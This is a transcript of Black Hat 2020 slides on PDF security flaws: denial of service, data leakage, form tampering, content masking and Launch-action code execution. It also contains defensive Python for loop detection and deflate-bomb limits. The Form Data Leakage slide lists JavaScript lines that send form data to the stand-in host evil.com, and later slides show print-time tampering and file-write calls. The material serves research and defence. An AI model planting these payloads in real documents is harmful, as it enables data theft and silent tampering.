Portable Document Flaws 101 - Black Hat Briefings, 2020-07-29
TRANSCRIPT
-
Portable Document Flaws 101
Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk
-
Overview
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation
5. Code Execution
6. Evaluation
-
The Portable Document Format
“De facto standard for electronic exchange of documents” -- Adobe
• First version released in 1993 by Adobe
• Latest version, PDF-2.0, released in 2017 by ISO
• 250 billion PDF documents opened in 2018
• Used by ~99% of companies and governmental institutions worldwide
-
Basics: PDF Structure
Diagram of a minimal PDF, section by section:
Header: %PDF-1.7
Body: 1 0 obj Catalog (/Pages 2 0 R); 4 0 obj stream („Hello world!“)
XRefTable: xref
Trailer: trailer (/Root 1 0 R)
-
Related Work
Diagram: the PDF structure from the previous slide with GIF89a… data of ≤ 1023 bytes placed in front of the PDF header (a PDF polyglot).
PDF Encryption: [Mueller2019]
PDF Signatures: [Mladenov2019]
PDF Redaction: [Garfinkel2013]
PDF Metadata: [Alonso2008]
PDF Polyglots: [Albertini2014]
-
Basics: PDF Actions
• Standard feature used for various purposes
  – Open hyperlink, go to a certain page, etc.
  – Even JavaScript is an action
• Various events that trigger actions
  – on open/close/print, etc.
• Target of actions: PDF File Specification
-
Diagram (Events → Actions → Targets):
Events, by object (Page, Annotation, Field, Catalog): /AA, /Contents, /Link, /Names, /OpenAction, /Open, /Print, /URI, /Base
Actions: Launch, Thread, GoToE, GoToR, ImportData, SubmitForm, URI, JavaScript
Targets: Embedded File, Local File, URL, Network Share, File, Call Action
-
Attacker Model
• Victim opens malicious PDF document
• Bad things happen (attack-dependent)
• No user interaction required
-
Overview
1. PDF Basics
2. Denial of Service: Infinite Loop, Deflate Bomb
3. Information Disclosure
4. Data Manipulation
5. Code Execution
6. Evaluation
-
DoS Evaluation Results
Infinite Loop
-
Infinite Loop
2 0 obj
<< … >>
endobj
/Pages 2 0 R
The reference 2 0 R points back at object 2 itself, so a parser that resolves references without remembering which objects it has already visited never terminates.
CVE-2007-0104
-
More Variants
• Action loop – PDF actions allow specifying a /Next action.
• ObjStm loop – Object streams may extend other ObjStms.
• Outline loop – PDF outline entries can refer to each other.
• Calculations – PDF defines PS/Type 4 calculator functions; the function stream on the slide is {/f {f} def f}, which defines f as a call to itself and then invokes it.
• JavaScript – Scripting can be used to create endless loops.
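The loop variants above all rely on a parser following object references without remembering where it has been. As an added example (not code from the talk or the PDF101 repository), the following walker detects such cycles in a parsed object table before recursing into the page tree, /Next action chains, outlines or ObjStm /Extends links; the object model ("N 0 R" keys mapping to dictionaries), the key set and the depth cap are this example's assumptions.

```python
# Added example (not from the talk): walk the reference-valued keys a parser
# recurses into (/Pages tree, /Next action chains, outlines, ObjStm /Extends)
# and report the first cycle. Objects are modelled as "N 0 R" -> dict; the
# key set and the depth cap are this example's assumptions.
FOLLOW_KEYS = ("/Kids", "/Next", "/First", "/Extends", "/Pages")
MAX_DEPTH = 512

def refs_of(obj):
    """References reachable from obj via FOLLOW_KEYS (scalar or array)."""
    refs = []
    for key in FOLLOW_KEYS:
        val = obj.get(key)
        if val is not None:
            refs.extend(val if isinstance(val, list) else [val])
    return refs

def find_cycle(objects, start):
    """DFS from start; returns the cycle as a path whose last element repeats
    its first, or None. Raises ValueError once nesting exceeds MAX_DEPTH."""
    state, path = {}, []

    def visit(ref):
        if state.get(ref) == "active":          # back edge: ref is on the path
            return path[path.index(ref):] + [ref]
        if state.get(ref) == "done" or ref not in objects:
            return None                         # finished, or dangling ref
        if len(path) >= MAX_DEPTH:
            raise ValueError(f"nesting deeper than {MAX_DEPTH} at {ref}")
        state[ref] = "active"
        path.append(ref)
        for nxt in refs_of(objects[ref]):
            cyc = visit(nxt)
            if cyc:
                return cyc
        path.pop()
        state[ref] = "done"
        return None

    return visit(start)

# Constructed object tables mirroring the loop variants on the slides.
PAGE_TREE_LOOP = {"1 0 R": {"/Type": "/Catalog", "/Pages": "2 0 R"},
                  "2 0 R": {"/Type": "/Pages", "/Kids": ["2 0 R"]}}
ACTION_LOOP = {"5 0 R": {"/S": "/GoTo", "/Next": "6 0 R"},
               "6 0 R": {"/S": "/GoTo", "/Next": "5 0 R"}}
OUTLINE_LOOP = {"5 0 R": {"/Type": "/Outlines", "/First": "6 0 R"},
                "6 0 R": {"/Title": "A", "/Next": "7 0 R"},
                "7 0 R": {"/Title": "B", "/Next": "6 0 R"}}
SANE_TREE = {"1 0 R": {"/Pages": "2 0 R"}, "3 0 R": {}, "4 0 R": {},
             "2 0 R": {"/Type": "/Pages", "/Kids": ["3 0 R", "4 0 R"]}}
```

A viewer that runs this check (or an equivalent visited-set) before resolving references rejects the document instead of spinning.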
-
Deflate Bomb
-
Deflate Bomb
• Zip bombs are well known
• Streams can be compressed
• Viewers must decompress to display the content
The slides then grow the content stream of object 4 0 obj step by step, comparing size on disk with memory needed after decompression:
Stream data                                      disk     mem     ratio
BT /F1 22 Tf 30 800 Td (Hello World...) Tj ET   (uncompressed baseline)
BT /F1 22 Tf 30 800 Td (AAAAAAAAAAA...) Tj ET   10 GB    10 GB   1:1
789cecdc3d2e84011486d16f...                      10 MB    10 GB   1:1023
789cedda5d4853611cc7f1b3...                      16 KB    10 GB   1:640,772
789c014202bdfd789cedda5d...                      578 B    10 GB   1:18,576,848
The 789c prefix is a zlib (FlateDecode) header; in the last row the decoded data is itself another zlib stream (the second 789c is visible inside), i.e. Flate layers are stacked to multiply the ratio.
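The countermeasure for this is to never inflate a stream without a budget, and to measure that budget against the original on-disk size so that stacked Flate layers cannot reset it. As an added example (not code from the talk or the PDF101 repository), the following decoder does exactly that with Python's zlib; MAX_OUTPUT, MAX_RATIO, the /FlateDecode-only filter chain and the constructed samples are this example's assumptions.

```python
import zlib

# Added example (not from the talk): decode a Flate stream under a budget so a
# deflate bomb is rejected before it is materialised. MAX_OUTPUT, MAX_RATIO
# and the samples below are this example's own assumptions.
MAX_OUTPUT = 64 * 1024 * 1024   # hard cap on decoded bytes per stream
MAX_RATIO = 1000                # cap on decoded size relative to on-disk size

class DeflateBombError(ValueError):
    """Raised when a stream would inflate past the configured budget."""

def bounded_inflate(data, budget):
    """Inflate one zlib stream, aborting as soon as output exceeds budget."""
    d = zlib.decompressobj()
    out, pending = bytearray(), data
    while not d.eof:
        # max_length bounds what one call may return; input not yet processed
        # stays in d.unconsumed_tail, so 10 GB of 'A' never reaches memory.
        piece = d.decompress(pending, 64 * 1024)
        out += piece
        if len(out) > budget:
            raise DeflateBombError(f"decoded stream exceeds {budget} bytes")
        pending = d.unconsumed_tail
        if not pending and not piece:
            break   # input exhausted without an end-of-stream marker
    return bytes(out)

def decode_stream(raw, filters):
    """Apply a /Filter chain (only /FlateDecode here). The budget is derived
    from the ORIGINAL on-disk size, so stacking Flate layers cannot evade it."""
    budget = min(MAX_OUTPUT, MAX_RATIO * len(raw))
    data = raw
    for name in filters:
        if name != "/FlateDecode":
            raise ValueError(f"filter {name} not handled in this example")
        data = bounded_inflate(data, budget)
    return data

def is_bomb(raw, filters):
    try:
        decode_stream(raw, filters)
        return False
    except DeflateBombError:
        return True

# Constructed samples: an ordinary content stream, and a doubly compressed run
# of 'A' bytes in the spirit of the (AAAA...) stream on the slides.
BENIGN_TEXT = b"BT /F1 22 Tf 30 800 Td (Hello World...) Tj ET"
BENIGN_RAW = zlib.compress(BENIGN_TEXT)
BOMB_RAW = zlib.compress(zlib.compress(b"A" * (8 * 1024 * 1024), 9), 9)
```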
-
Overview
1. PDF Basics
2. Denial of Service
3. Information Disclosure: URL Invocation, Form Data Leakage, Local File Leakage, Credential Theft
4. Data Manipulation
5. Code Execution
6. Evaluation
-
URL Invocation
-
Diagram: the events/actions/targets diagram from the PDF Actions slide. Compare [Filiol2008]
-
Form Data Leakage
-
Form Data Leakage
• Idea: victim obtains modified PDF form
• Attacker silently exfiltrates data
(Image source: wondershare.com)
-
Diagram: the events/actions/targets diagram from the PDF Actions slide, highlighting the Annotation /AA on close and /AA did print events and the JavaScript action. Exfiltration paths shown on the slide:
value = this.getAnnots()[0].contents;
this.submitForm({cURL: "http://evil.com/"});
this.getURL("http://evil.com/"+value);
app.launchURL("http://evil.com/"+value);
app.media.getURLData("http://evil.com/"+value, "audio/mp3");
SOAP.connect("http://evil.com/"+value);
SOAP.request({cURL:"http://evil.com/"+value, oRequest:{}, cAction:""});
this.importDataObject("file", "http://evil.com/"+value);
app.openDoc("http://evil.com/"+value);
-
Local File Leakage
-
Local File Leakage
• Goal: exfiltrate arbitrary files on disk to attacker by chaining PDF features
-
Diagram: the events/actions/targets diagram from the PDF Actions slide, highlighting the Local File and URL targets.
-
Credential Theft
-
Credential Theft
• Offline cracking
  – NTLMv2: modern GPU requires 2.5 h for eight chars
  – NTLMv1, LM: considered broken [Marlinspike2012]
• Pass-the-hash or relay attacks
  – Compare [Ochoa2008, Hummel2009]
  – Depending on Windows security policy
-
Credential Theft
(Image source: Threatpost)
-
Overview
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation: Form Modification, File Write Access, Content Masking
5. Code Execution
6. Evaluation
-
Form Modification
-
Form Modification
• Idea: victim obtains modified PDF form
• Attacker silently manipulates data (e.g., on printing)
(Image source: wondershare.com)
-
Diagram: the events/actions/targets diagram from the PDF Actions slide, highlighting the /AA will print and /AA did print events and the JavaScript action.
On /AA will print:
old_value = getAnnots()[i].contents;
getAnnots()[i].contents = "new value";
On /AA did print:
getAnnots()[i].contents = old_value;
-
File Write Access
-
Diagram: the events/actions/targets diagram from the PDF Actions slide, highlighting the JavaScript action with a local file as target. File-writing calls shown on the slide:
this.exportAsFDF(false, true, "file.fdf");
this.exportAsXFDF(false, true, "file.xfdf");
this.exportAsText(true, "file.txt");
this.exportDataObject({cName: "file.pdf"});
this.exportXFAData({cPath: "file.xdp"});
this.extractPages({cPath: "file.pdf"});
-
Content Masking
-
Content Masking
Spec ambiguities:
• PDF confusion
• Doc confusion
• Object confusion
• Content streams
• Stream syntax
Diagram: the PDF structure (Header %PDF-1.7; Body with 1 0 obj Catalog /Pages 2 0 R and 4 0 obj stream „Hello world!“; XRefTable xref; Trailer trailer /Root 1 0 R), with the element affected by each ambiguity highlighted in turn.
-
Content Masking
4 0 obj
<< … >>
stream
q 0.2 0.4 1 rg 0 0 595 842 re F Q BT /F1 22 Tf 30 800 Td (This is the 1st stream part) Tj ET
endstream
q 1 0.3 0.3 rg 0 0 595 842 re F Q BT /F1 22 Tf 30 800 Td (This is the 2nd stream part) Tj ET
endstream
endobj
The stream data contains an endstream keyword of its own: a viewer that ends the stream at the first endstream shows the first part (blue page), one that continues to the second endstream shows the second part (red page), so two viewers display different content for the same object.
-
Overview
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation
5. Code Execution: Launch Action
6. Evaluation
Launch Action
-
Code Execution
• Launch Action
• PDF has “code execution by design”
-
Overview
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation
5. Code Execution
6. Evaluation
-
Countermeasures
• Eliminating specification ambiguities
• Resource limitation and sandboxing
• Removing or restricting JavaScript
• Identification of dangerous paths
-
Black Hat Sound Bytes
• PDF is a complex format
• Standard is full of pitfalls
• Logic chain RCE in 2020 :)
Exploits: https://github.com/RUB-NDS/PDF101